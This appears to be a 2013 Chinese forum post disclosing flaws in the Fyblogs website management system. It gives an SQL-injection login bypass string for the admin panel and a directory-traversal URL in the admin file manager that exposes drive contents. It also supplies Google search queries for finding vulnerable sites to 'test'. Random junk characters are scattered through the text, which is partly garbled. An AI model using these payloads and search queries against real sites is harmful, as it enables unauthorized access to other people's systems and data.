漏洞类型: 未授权访问/权限绕过
" |+ k, s7 `4 B( S+ Y
1 s! k! d5 n1 b6 D简要描述:. K2 \# p) q' l, Y- W0 d( [
* [- R- s3 |0 z" S5 W# U7 g3 ?9 \Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 z V$ |4 W5 @" k6 P! f# T- K6 d. p9 e. D
详细说明:
) H% j+ d. t# m; X: k4 l1 h2 l- m# ^" \% b# }% Y7 }% N
后台万能密码 'or'='or'
! u% B# y% W- M3 z- m1 X后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
* _) l! ~/ m; J2 d" `admin/uploadfile.asp?currentFolder=/upfiles/../( J3 Z& O5 x3 [
2 j7 O- U. C1 w% d% w
漏洞证明:( X/ H) l* {/ s. Y$ s0 i- i% t1 P* @
7 ?! ?( c D5 E
谷歌:inurl:type.asp?id=1 新闻中心( _6 r: m( l, |+ k4 R
或者 :inurl:download_ok.asp?
: Q- Z+ n0 P* G6 y+ O9 m8 K) F$ p' e
可以测试9 G" e6 D0 d$ N, ^1 ^( |
4 E G! D; b$ t( y( s7 ]- v4 C; m
|
发表于 2013-3-7 13:07:46
收藏
支持
反对